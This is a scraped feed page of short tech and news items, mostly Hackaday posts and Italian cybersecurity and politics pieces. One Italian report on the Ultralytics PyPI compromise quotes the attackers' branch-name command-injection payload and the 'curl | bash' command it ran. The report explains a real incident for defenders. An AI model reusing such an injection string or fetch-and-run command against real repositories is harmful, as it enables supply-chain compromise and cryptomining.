Recently a company called Z-Polymers introduced its new Tullomer FDM filament that comes with a lofty bullet list of purported properties that should give materials like steel, aluminium, and various polymers a run for their money. Even better is that it is compatible with far lower specification FDM printers than e.g. PEEK. Intrigued, the folks over at All3DP figured that they’d should get some hands-on information on this filament and what’s it like to print with in one of the officially sanctioned Bambu Lab printers: these being the X1C & X1CE with manufacturer-provided profiles.

The world of engineering-grade FDM filaments has existed for decades, with for example PEEK (polyether ether ketone) having been around since the early 1980s, but these require much higher temperatures for the extruder (360+℃) and chamber (~90℃) than Tullomer, which is much closer (300℃, 50℃) to a typical high-performance filament like ABS, while also omitting the typical post-process annealing of PEEK. This assumes that Tullomer can match those claimed specifications, of course.

One of the current users of Tullomer is Erdos Miller, an engineering firm with a focus on the gas and oil industry. They’re using it for printing parts (calibration tooling) that used to be printed in filaments like carbon fiber-reinforced nylon (CF-PA) or PEEK, but they’re now looking at using Tullomer for replacing CF-PA and machined PEEK parts elsewhere too.

It’s still early days for this new polymer, of course, and we don’t have a lot of information beyond the rather sparse datasheet, but if you already have a capable printer, a single 1 kg spool of Tullomer is a mere $500, which is often much less or about the same as PEEK spools, without the requirement for a rather beefy industrial-strength FDM printer.


hackaday.com/2024/12/08/new-tu…



Muri digitali in Azione: esercitazioni Runet in Daghestan per isolare l’Internet russo dal mondo


Il 6 dicembre in Daghestan sono state registrate interruzioni nel funzionamento dei servizi online stranieri, tra cui WhatsApp, Telegram e YouTube. Il motivo è stato un esercizio di Roskomnadzor (Il Servizio federale per la supervisione delle comunicazioni, della tecnologia dell’informazione e dei mass media della federazione russa), nell’ambito del quale sono stati testati scenari per disabilitare l’accesso al segmento straniero di Internet.

Il provider Ellco ha riferito che dalle 16:00 l’accesso a una serie di servizi era limitato.

Caro abbonato, in connessione con gli esercizi in corso di Roskomnadzor per testare scenari per disabilitare l’accesso al segmento straniero di Internet, oggi, 6 dicembre 2024, dalle 16:00, ci sono restrizioni all’accesso ad alcuni siti e servizi. (WhatsApp, ecc.) Purtroppo non possiamo influenzare questa situazione. Tempo di recupero stimato, 16:00 del 7/12/2024.”

Roskomnadzor ha spiegato a Kommersant che le esercitazioni hanno lo scopo di determinare l’efficacia della “infrastruttura di sostituzione delle chiavi” in caso di chiusura deliberata del segmento Internet russo dall’esterno. Inoltre, vengono individuati i sistemi informativi le cui prestazioni dipendono dalla comunicazione con servizi, biblioteche e altre risorse situate in reti di comunicazione straniere.

Lo scopo dell’esercitazione è confermare la disponibilità dell’infrastruttura Internet russa a controllare i principali servizi stranieri e russi in caso di deliberata influenza esterna“, ha affermato l’RKN.

All’inizio di novembre, sui canali Telegram ha cominciato a circolare una lettera inviata dalla Banca Centrale alle banche russe, in cui si affermava che Roskomnadzor intende condurre esercizi a dicembre “per disabilitare l’accesso al segmento estero di Internet in alcune regioni”.

Quindi il dipartimento ha spiegato che la verifica della disponibilità dei sistemi chiave per garantire la sostenibilità della Runet viene effettuata annualmente, il programma per la loro attuazione è approvato dal Ministero dello sviluppo digitale della Russia in accordo con l’FSB della Russia e Roskomnadzor. “I controlli non influiscono sull’accesso a Internet degli utenti russi“, ha riferito RKN.

L'articolo Muri digitali in Azione: esercitazioni Runet in Daghestan per isolare l’Internet russo dal mondo proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.




Tiny NFC-Powered Keychain Thermometer


ATTiny NFC Thermometer keychain with keys

What if your keychain could tell you the temperature, all while staying battery-free? That’s the essence of this innovative keychain ‘NFC_temp’ by [bjorn]. This nifty gadget harnesses energy from an NFC field—like the one created by your smartphone—to power itself just long enough to take a precise temperature reading. Using components like an ATTiny1626 microcontroller, a TMP117 thermometer, and an RF430CL330H NFC IC, NFC_temp cleverly stores harvested power in a capacitor to function autonomously.

The most impressive part? This palm-sized device (18×40 mm) uses a self-designed 13.56 MHz antenna to draw energy from NFC readers. The temperature is then displayed on the reader, with an impressive accuracy of ±0.1 °C. Creator [bjorn] even shared challenges, like switching from an analog sensor due to voltage instability, which ultimately led to his choice of the TMP117. Android phones work best with the tag, while iOS devices require a bit more angling for reliable detection.

Projects like NFC_temp underscore the creativity within open source. It’s a brilliant nod to the future of passive, wireless, energy-efficient designs. Since many of us will all be spending a lot of time around the Christmas tree this month, why not fit it in a bauble?


hackaday.com/2024/12/08/tiny-n…



Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata


È stato attaccato il repository della libreria Python Ultralytics, ampiamente utilizzata nelle attività di visione artificiale. Approfittando di questa vulnerabilità, i criminali informatici hanno pubblicato versioni dannose della libreria su PyPI, progettate per il mining di criptovalute.

La vulnerabilità era associata al pacchetto ultralytics-actions, che automatizza l’avvio di gestori per determinate azioni nel repository. Questo è lo scopo per cui viene utilizzato il meccanismo GitHub Actions. Nel progetto Ultralytics, il gestore collegato all’evento pull_request_target ha chiamato il file format.yml per formattare il codice nelle richieste pull in entrata. Questo file eseguiva comandi shell con modelli di caratteri jolly come:

git pull origin ${{ github.head_ref || github.ref }}

git config –global utente.nome “${{ input.github_nomeutente }}”

git config –global user.email “${{ input.github_email }}”

Gli aggressori hanno inviato una richiesta pull al repository Ultralytics, specificando la seguente riga come nome del ramo:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Ciò ha comportato l’esecuzione del comando:

curl -sSfL raw.githubusercontent.com/…/file.sh | bash

Di conseguenza, gli aggressori hanno avuto accesso ai token del repository e ad altri dati riservati. Si ritiene che abbiano modificato il gestore di pubblicazione per rimuovere la verifica dell’account autorizzato a pubblicare versioni su PyPI e abbiano utilizzato la tecnica di avvelenamento della cache di build di GitHub Actions per inserire i propri dati nella versione.

La prima versione dannosa di Ultralytics, versione 8.3.41, è stata pubblicata su PyPI il 4 dicembre alle 23:51 (MSK) ed eliminata alle 12:15 del giorno successivo. Alle 15:47 è stata pubblicata un’altra versione 8.3.42, che è stata rimossa alle 16:47. Pertanto le versioni dannose sono rimaste disponibili per il download per circa 13 ore. Queste versioni contenevano codice che scaricava il componente di mining XMRig da un server esterno.

Gli sviluppatori hanno risolto rapidamente il problema e hanno rilasciato le versioni correttive 8.3.43 e 8.3.44. Due giorni dopo, però, gli aggressori hanno nuovamente pubblicato le versioni dannose 8.3.45 e 8.3.46, che contenevano un codice diverso. Fino al completamento dell’indagine, si consiglia agli utenti di astenersi dall’installare nuove versioni e di impegnare la versione 8.3.44 come dipendenze.

L'articolo Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata proviene da il blog della sicurezza informatica.

Maronno Winchester reshared this.



Aziende che legiferano: X aiuta ad aggiornare il Kids Online Safety Act nella spinta finale per l'approvazione alla Camera guidata dai repubblicani

Sembra che gli sponsor scommettano sul fatto che il sostegno di Elon Musk potrebbe far pendere la bilancia verso il traguardo

"Guidati da X, i nuovi cambiamenti apportati al Kids Online Safety Act rafforzano il disegno di legge, salvaguardando al contempo la libertà di parola online e assicurando che non venga utilizzata per soffocare l'espressione", hanno affermato i senatori repubblicani Blumenthal e Blackburn in una dichiarazione congiunta

theverge.com/2024/12/7/2431552…

@Politica interna, europea e internazionale



The Audiophile Carrot


27568429

The widely quoted carrot factoid that the vegetable’s orange colour is the result of patriotic Dutch farmers breeding them that way may be an urban myth, but it’s certainly true that they can pass an audio signal in a time of need. [Julian Krause] follows up on a Reddit meme of a carrot being used to join two phono plugs, and appears to find the organic interconnect to be of good quality.

We had to admit a second look at a calendar to be sure that it’s not April 1st, but while his manner is slightly tongue in cheek it seems he’s really characterising the audio performance of a carrot. What he finds is a bit of attenuation, some bass cut, and an intrusion of RF interference pickup, but surprisingly, not a bad distortion figure.

Of course, we’re guessing the real point of the exercise is to poke fun at the world of excessive hi-fi equipment, something we’ve been only too glad to have a go at ourselves from time to time. But if the tests are to be taken at face value it seems that in a pinch, a carrot will do as a means to hook together line level audio cables, no doubt lending a sweet and crunchy overtone to the result. The video is below the break, for your entertainment.

youtube.com/embed/_bV1sfQQkZY?…


hackaday.com/2024/12/08/the-au…



Ormai i tuoi post su Bluesky sono probabilmente in un mucchio di set di dati

Ora che è stato infranto il sigillo sull'estrazione dei post di Bluesky in set di dati per l'apprendimento automatico, le persone stanno prendendo in giro gli utenti e si stanno superando a vicenda creando set di dati sempre più grandi di post di Bluesky non resi anonimi e con testo completo, presi direttamente dal flusso pubblico della piattaforma di social media, tra cui uno che contiene quasi 300 milioni di post.

@Intelligenza Artificiale

404media.co/bluesky-posts-mach…

reshared this



Per rilanciare la Difesa europea 500 miliardi non bastano. Il punto di Nones

@Notizie dall'Italia e dal mondo

Secondo un articolo del Financial Times, a Bruxelles si starebbe valutando la creazione di un nuovo fondo per gli acquisti militari congiunti, dal valore di 500 miliardi euro. Il tema della difesa europea rimane centrale, ma il nuovo fondo rischia di non essere



Una riserva militare modulare e prontamente mobilitabile. Il progetto sulle Forze armate

@Notizie dall'Italia e dal mondo

Nel n. 111 dell’Osservatorio di Politica internazionale, intitolato “Una forza di riserva per l’Italia”, a cura di Matteo Mazziotti di Celso e del generale Francesco Diella, si affronta una riflessione, non più rimandabile, sulla costruzione di una riserva militare in grado di coniugare quantità e



WASM-4: Retro Game Dev Right in Your Browser


Pixel mashup with Wasm-4 logo and retro graphics

Have you ever dreamt of developing games that run on practically anything, from a modern browser to a microcontroller? Enter WASM-4, a minimalist fantasy console where constraints spark creativity. Unlike intimidating behemoths like Unity, WASM-4’s stripped-back specs challenge you to craft games within its 160×160 pixel display, four color palette, and 64 KB memory. Yes, you’ll curse at times, but as every tinkerer knows, limitations are the ultimate muse.

Born from the WebAssembly ecosystem, this console accepts “cartridges” in .wasm format. Any language that compiles to WebAssembly—be it Rust, Go, or AssemblyScript—can build games for it. The console’s emphasis on portability, with plans for microcontroller support, positions it as a playground for minimalist game developers. Multiplayer support? Check. Retro vibes? Double-check.

Entries from a 2022’s WASM-4 Game Jam showcase this quirky console’s charm. From pixel-perfect platformers to byte-sized RPGs, the creativity is staggering. One standout, “WasmAsteroids,” demonstrated real-time online multiplayer within these confines—proof that you don’t need sprawling engines to achieve cutting-edge design. This isn’t just about coding—it’s about coding smart. WASM-4 forces you to think like a retro engineer while indulging in modern convenience.

WASM-4 is a playground for anyone craving pure, unadulterated experimentation. Whether you’re a seasoned programmer or curious hobbyist, this console has the tools to spark something great.


hackaday.com/2024/12/08/wasm-4…

Gazzetta del Cadavere reshared this.



Black Basta Colpisce BT Group: 500 GB di Dati Rubati e Pubblicati


Il colosso britannico delle telecomunicazioni BT Group ha dovuto affrontare un tentativo di attacco informatico contro una delle divisioni della sua vecchia struttura aziendale. Il gruppo di hacker Black Basta ha rivendicato l’incidente. Il gruppo ha pubblicato il nome dell’azienda sul proprio sito web, ma in realtà l’obiettivo dell’attacco era molto più modesto: la divisione BT Conferencing, con sede nel Massachusetts.

BT Group ha confermato che l’attacco ha preso di mira alcuni elementi della piattaforma BT Conferencing, che sono stati immediatamente rimossi e isolati. Secondo la società, i server interessati non influiscono sui servizi di conferenza BT, che rimangono pienamente operativi. Nessun altro servizio del gruppo o dato dei clienti è stato compromesso. Le indagini sull’incidente continuano in collaborazione con le autorità di regolamentazione e le forze dell’ordine.
27554992
Black Basta afferma di aver rubato circa 500 GB di dati, inclusi file finanziari, accordi di riservatezza, informazioni sugli utenti e altri documenti. Tra i campioni sul sito web del gruppo ci sono scansioni di carte d’identità, documenti di visto e informazioni sui bonus dei dipendenti. Tuttavia, la maggior parte del materiale sembra provenire dall’ultimo decennio.

Black Basta, che ha iniziato a operare come modello Ransomware-as-a-Service ( RaaS ) nell’aprile 2022, ha attaccato una serie di grandi obiettivi, tra cui la società di difesa tedesca Rheinmetall, la società svizzera di robotica ABB e la società britannica di outsourcing tecnologico Capita.

Secondo l’FBI e la CISA, gli affiliati di Black Basta hanno attaccato più di 500 organizzazioni tra aprile 2022 e maggio 2024 . Il gruppo ha inoltre crittografato e rubato dati da almeno 12 dei 16 settori infrastrutturali critici.

Dopo che il sindacato del crimine informatico Conti ha cessato le sue attività nel maggio 2022, si è diviso in diversi gruppi, uno dei quali si ritiene sia diventato Black Basta. Una ricerca condotta da Elliptic e Corvus Insurance mostra che il ransomware ha ricevuto almeno 100 milioni di dollari in riscatti da più di 90 vittime (a novembre 2023). Va notato che il gruppo ha attaccato almeno 20 vittime nelle prime 2 settimane di lavoro.

L'articolo Black Basta Colpisce BT Group: 500 GB di Dati Rubati e Pubblicati proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Il Cavo USB E’ sicuro? La Tomografia Computerizzata TC è il futuro nella Supply-chain


Esistono molte opzioni di cavi USB-C sul mercato, dai modelli economici che costano pochi dollari a quelli premium che costano oltre i 100. Il costo dipende dalla lunghezza, dalla qualità costruttiva, dal rispetto degli standard USB-C e dal marchio. Sebbene USB-C sia stato creato per semplificare la connessione dei dispositivi, si è rivelato uno standard abbastanza complesso che richiede la conoscenza delle sue funzionalità. Lo scopo principale di USB-C è combinare trasferimento dati, audio, video e ricarica in un unico cavo.

Tuttavia, le specifiche dei cavi USB-C variano notevolmente e la confezione spesso non fornisce informazioni complete sulle loro capacità. Inoltre, USB-C può comportare rischi per la sicurezza a causa dell’elettronica nascosta incorporata.

Anche se i cavi hanno un aspetto simile, la loro struttura interna può variare notevolmente. Gli esempi includono i cavi Thunderbolt 4 da 129 dollari di Apple, che utilizzano elettronica attiva complessa, e i semplici cavi Basics da 11,69 dollari di Amazon, che non utilizzano nemmeno tutti i pin del connettore USB-C. Attrezzature moderne come gli scanner industriali possono identificare le differenze di progettazione.
27552991
Di particolare interesse è il cavo O.MG, sviluppato per la ricerca sulla sicurezza. Sembra un normale cavo USB-C, ma al suo interno si nasconde un’elettronica in grado di intercettare dati, iniettare codice dannoso e persino registrare le sequenze di tasti. I metodi di test standard non sono sufficienti per rilevare tali minacce. Ad esempio, per identificare strutture di cavi complesse erano necessarie la scansione 3D e la visualizzazione dettagliata.

La questione della sicurezza del cavo USB-C sta diventando sempre più rilevante. I moderni metodi di verifica, come la scansione TC, sono già utilizzati per prevenire attacchi durante le fasi di produzione delle apparecchiature. Un esempio delle gravi conseguenze delle vulnerabilità nella catena di fornitura è il caso dell’utilizzo di dispositivi modificati in Libano che hanno attaccato gli Hezbollah.

Per gli utenti comuni il rischio rimane minimo, poiché i cavi specializzati come O.MG o EvilCrow Wind sono costosi e difficili da trovare. Tuttavia, per protezione, si consiglia di utilizzare cavi USB-C certificati ed evitare l’uso di porte di ricarica pubbliche.

Cos’è una sanzione TC


La scansione TC è un acronimo che si riferisce alla Tomografia Computerizzata (o TAC, Tomografia Assiale Computerizzata). È una tecnica di imaging avanzata che utilizza i raggi X per creare immagini tridimensionali dettagliate di un oggetto o un organismo, combinando una serie di immagini bidimensionali prese da diverse angolazioni.

Come Funziona


  1. Emissione di Raggi X: La macchina emette un fascio di raggi X che attraversa l’oggetto o il corpo.
  2. Raccolta dei Dati: I sensori rilevano l’intensità dei raggi X che emergono dall’altra parte, variando in base alla densità dei materiali attraversati.
  3. Elaborazione Computerizzata: Un computer elabora queste informazioni per generare immagini dettagliate in sezioni (slice) o in 3D.


Applicazioni della Scansione TC


  • Medicina: È comunemente usata per diagnosticare malattie, traumi o anomalie interne.
  • Industria e Sicurezza: Può essere utilizzata per analizzare la struttura interna di dispositivi e materiali senza danneggiarli, come nel caso dei cavi USB-C analizzati per scoprire elettronica nascosta o vulnerabilità.
  • Ricerca sulla Sicurezza Informatica: Nel contesto citato, la scansione TC permette di rilevare componenti elettronici nascosti all’interno di cavi USB-C che sembrano normali, identificando eventuali minacce come microchip o trasmettitori.

È una tecnica molto utile per ispezioni non distruttive e per individuare dettagli che altrimenti non sarebbero visibili con metodi tradizionali.

L'articolo Il Cavo USB E’ sicuro? La Tomografia Computerizzata TC è il futuro nella Supply-chain proviene da il blog della sicurezza informatica.



SIRIA. Caduta Damasco, Bashar Assad è fuggito


@Notizie dall'Italia e dal mondo
I miliziani di Hay'at Tahrir al Sham e i loro alleati hanno annunciato dalla televisione pubblica di aver preso il potere
L'articolo SIRIA. Caduta Damasco, Bashar Assad è fuggito proviene da Pagine Esteri.

pagineesteri.it/2024/12/08/med…





Cheap FPGA PCIe Development


27545180

Typically, if you want to build an FPGA project inside a PC, you’d need a fairly expensive development board that plugs into the bus. However, [CircuitValley] found some IBM RS-485 boards that are little more than a PCIe board with an Intel FPGA onboard. These are widely avaiable on the surplus market for around $20 shipped. He’s been documenting how to use them.

The FPGA onboard is a Cyclone IV with about 21,000 logic elements and a little over 750 kbits of memory. The board itself has configuration memory, power management, and a few connectors. The JTAG header is unpopulated, but the footprint is there. You simply need to supply a surface-mount pin header and an external JTAG probe, and you can program. Even if you aren’t interested in using an FPGA board, the reverse engineer steps are fun to watch.

The situation reminds us a little of the RTL-SDR — when a device uses a programmable device to perform nearly all of its functions, it is subject to your reprogramming. What would you do with a custom PCIe card? You tell us. Need a refresher on the bus? We can help. Thinking of building some sort of FPGA accelerator? Maybe try RIFFA.

youtube.com/embed/8liWiCM8JM4?…


hackaday.com/2024/12/07/cheap-…



A Look inside IKEA’s Vallhorn Motion Sensor Teardown


27537722

A good source of hackable home automation parts has come for a while in the form of inexpensive modules offered by large retailers such as Lidl, or IKEA. They’re readily available and easy to play with, they work with open source hubs, so what’s not to like! As an example, [Circuit Valley] has an IKEA Vallhorn motion sensor for a teardown, it’s as you might expect, a passive infrared sensor (PIR) sensor coupled with a Zigbee interface.

Inside the ultrasonic welded case is a small PCB and a Fresnel lens on the inside of the top cover, and a small PCB for the electronics. We applaud the use of a Swiss Army knife can opener as a spudger. The interesting part comes in identifying the individual components: the Silicon Labs EFR32MG21 SoC is easy enough, but another mystery 8-pin chip is more elusive. The part number suggests an Analog Devices op-amp for signal conditioning the PIR output, but the pinout seems not to support it and from here we think it’s too expensive a part for a budget item like this.

There’s a handy header for talking to the SoC, which we’d love to report is open and ready to be hacked, but we’re not getting too optimistic. Even if not hackable though, we’re guessing many of you find uses for these things.

youtube.com/embed/Z-XqmBRw9r8?…


hackaday.com/2024/12/07/a-look…



Microchess Remembered


27527760

Playing chess has always been a bellwether for computers. The game isn’t trivial, but the rules are managably simple. However, the game is too complex to be easily solved entirely, so you have to use tricky software to play a credible game. Big computers do have an advantage, of course. But Microchess — arguably the first commercial game for home computers — was able to play on tiny machines like the Kim-1. [Joachim Froholt] interviewed [Peter Jennings] — the man behind Microchess to learn the whole story of its creation.

In 1960, [Jennings] was ten years old and had to persuade the local librarian to let him read adult books on electronics and computers. Five years later, a ham radio teletype and some circuitry helped him practice chess openings and was the first of many chess-playing machines he’d build or program.

Microchess itself took six months of painstaking programming, entering hex codes into the computer. Word leaked out from a user’s group meeting (where Microchess beat a human player), and [Jennings] was swamped with requests for the program. In late 1976, the program was offered for sale as a teletype listing or, for an extra $3, a cassette tape.

The program went on to be very successful and moved to other platforms. Commodore even made a special dedicated device based on the Kim-1 to play Microchess, a piece of hardware unique enough that [Michael Gardi] honored it with one of his phenomenal replicas.


hackaday.com/2024/12/07/microc…



The £25,000 Tom Evans Pre-Amp Repair and a Copyright Strike


27515287

We were recently notified by a reader that [Tom Evans] had filed a copyright claim against [Mark]’s repair video on his Mend it Mark YouTube channel, taking down said repair video as well as [Mark]’s delightful commentary. In a new video, [Mark] comments on this takedown and the implications. The biggest question is what exactly was copyrighted in the original video, which was tough because YouTube refused to pass on [Mark]’s questions or provide further details.

In this new video the entire repair is summarized once again using props instead of the actual pre-amp, which you can still catch a glimpse of in our earlier coverage of the repair. To summarize, there was one bad tantalum capacitor that caused issues for one channel, and the insides of this twenty-five thousand quid pre-amp looks like an artistic interpretation of a Jenga tower using PCBs. We hope that this new video does stay safe from further copyright strikes from an oddly vengeful manufacturer after said manufacturer event sent the defective unit to [Mark] for a repair challenge.

Since this purportedly ‘audiophile-level’ pre-amplifier uses no special circuits or filtering – just carefully matched opamps – this is one of those copyright strike cases that leave you scratching your head.

youtube.com/embed/yPIrCaeVtvI?…


hackaday.com/2024/12/07/the-25…




PODCAST. Siria. Caduta Hama, i jihadisti si lanciano verso Homs e Damasco


@Notizie dall'Italia e dal mondo
Le forze jihadiste guidate da Hay'at Tahrir Al Sham che stanno travolgendo oltre ogni previsione l'esercito siriano, ora circondano Homs e sono a pochi chilometri da Damasco. L'analisi del giornalista Lorenzo Trombetta, esperto di Siria e Libano
L'articolo



Liquid Metal Ion Thrusters Aren’t Easy


27502127

What do scanning electron microscopes and satellites have in common? On the face of things, not much, but after seeing [Zachary Tong]’s latest video on liquid metal ion thrusters, we see that they seem to have a lot more in common than we’d initially thought.

As you’d expect with such a project, there were a lot of false starts and dead ends. [Zach] started with a porous-emitter array design, which uses a sintered glass plate with an array of tiny cones machined into it. The cones are coated in a liquid metal — [Zach] used Galinstan, an alloy of gallium, indium, and tin — and an high voltage is applied between the liquid metal and an extraction electrode. Ideally, the intense electric field causes the metal to ionize at the ultra-sharp tips of the cones and fling off toward the extraction electrode and into the vacuum beyond, generating thrust.

Getting that working was very difficult, enough so that [Zach] gave up and switched to a slot thruster design. This was easier to machine, but alas, no easier to make work. The main problem was taming the high-voltage end of things, which seemed to find more ways to produce unwanted arcs than the desired thrust. This prompted a switch to a capillary emitter design, which uses a fine glass capillary tube to contain the liquid metal. This showed far more promise and allowed [Zach] to infer a thrust by measuring the tiny current created by the ejected ions. At 11.8 μN, it’s not much, but it’s something, and that’s the thing with ion thrusters — over time, they’re very efficient.

To be sure, [Zach]’s efforts here didn’t result in a practical ion thruster, but that wasn’t the point. We suspect the idea here was to explore the real-world applications for his interests in topics like electron beam lithography and microfabrication, and in that, we think he did a bang-up job with this project.

youtube.com/embed/dfYSBlV90NQ?…


hackaday.com/2024/12/07/liquid…



Troppa burocratizzazione in Esa. L’astronauta Vittori scrive al ministro Urso

@Notizie dall'Italia e dal mondo

Egregio ministro, la storia dello spazio italiano rappresenta un capitolo straordinario, che continua a suscitare orgoglio nel nostro Paese. Dal lancio del satellite San Marco, di cui quest’anno celebriamo il 60° anniversario, al contributo ineguagliabile alla



Tis the Season


27486286

’Tis the season for soldering! At least at my house. My son and I made some fairly LED-laden gifts for the immediate relatives last year, and he’s got the blinky bug. We were brainstorming what we could make this year, and his response was “I don’t care, but it needs to have lots of LEDs”.

27486291It’s also the season for reverse engineering, apparently, because we’re using a string of WS2812-alike “fairy lights”. These are actually really neat, they look good and are relatively cheap. It’s a string of RGB LEDs with drivers, each dipped in epoxy, and run on a common three-enameled-wire bus. Unlike WS2812s, which pass the data on to the next unit in the line and then display them with a latching pulse at the end of a sequence, these LED drivers seem to count how many RGB packets have been sent down the wire, and only respond to their own number.

This means that if you cut up a string of 200 LEDs, it behaves like a string of 200 WS2812s. But if you cut say 10 LEDs off the string, where you cut them matters. If you cut it off the front of the string, you only have to send 10 color packets. If you cut them off the other end, you need to send 290 dummy packets before they even start listening. Bizarre, but ’tis the season for bizarre hacks.

And finally, ’tis the season for first steps into “software architecture”. Which is to say that my son is appreciating functions for the first time in his life. Controlling one LED is easy, but making a light show is about two more abstraction layers on top of that. We’ve been having fun making them dim, twinkle, and chase so far. We only have two more weekends, though, and we don’t have a final light show figured out yet, but after all, ’tis the season for last minute present hacking.

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!


hackaday.com/2024/12/07/tis-th…




Printing in Multi-material? Use These Filament Combos


27473705

If one has a multi-material printer there are more options than simply printing in different colors of the same filament. [Thomas Sanladerer] explores combinations of different filaments in a fantastic article that covers not just which materials make good removable support interfaces, but also which ones stick to each other well enough together to make a multi-material print feasible. He tested an array of PLA, PETG, ASA, ABS, and Flex filaments with each in both top (printed object) and bottom (support) roles.
27473707A zero-clearance support where the object prints directly on the support structure can result in a very clean bottom surface. But only if the support can be removed easily.
People had already discovered that PETG and PLA make pretty good support for each other. [Thomas] expands on this to demonstrate that PLA doesn’t really stick very well to anything but itself, and PETG by contrast sticks really well to just about anything other than PLA.

One mild surprise was that flexible filament conforms very well to PLA, but doesn’t truly stick to it. Flex can be peeled away from PLA without too much trouble, leaving a very nice finish. That means using flex filament as a zero-clearance support interface — that is to say, the layer between the support structure and the PLA print — seems like it has potential.

Flex and PETG by contrast pretty much permanently weld themselves together, which means that making something like a box out of PETG with a little living hinge section out of flex would be doable without adhesives or fasteners. Ditto for giving a PETG object a grippy base. [Thomas] notes that flexible filaments all have different formulations, but broadly speaking they behave similarly enough in terms of what they stick to.

[Thomas] leaves us with some tips that are worth keeping in mind when it comes to supported models. One is that supports can leave tiny bits of material on the model, so try to use same or similar colors for both support and model so there’s no visual blemish. Another tip is that PLA softens slightly in hot water, so if PLA supports are clinging stubbornly to a model printed in a higher-temperature material like PETG or ABS/ASA, use some hot water to make the job a little easier. The PLA will soften first, giving you an edge. Give the video below a watch to see for yourself how the combinations act.

youtube.com/embed/5VV2fbJ0apg?…


hackaday.com/2024/12/07/printi…



Sesta generazione, il programma statunitense Ngad rimane sospeso in vista dell’insediamento di Trump

@Notizie dall'Italia e dal mondo

L’Aeronautica degli Stati Uniti ha deciso di lasciare ai vertici politici della prossima amministrazione la decisione ultima sul programma Next generation air dominance (Ngad). Recentemente, il programma Ngad era andato



Every Saturday at 1 pm I host a radio broadcast called "One Week in Poland", where I report the most relevant news of the last 7 days in Poland.

If you like it you can listen it here: imiradio.pl/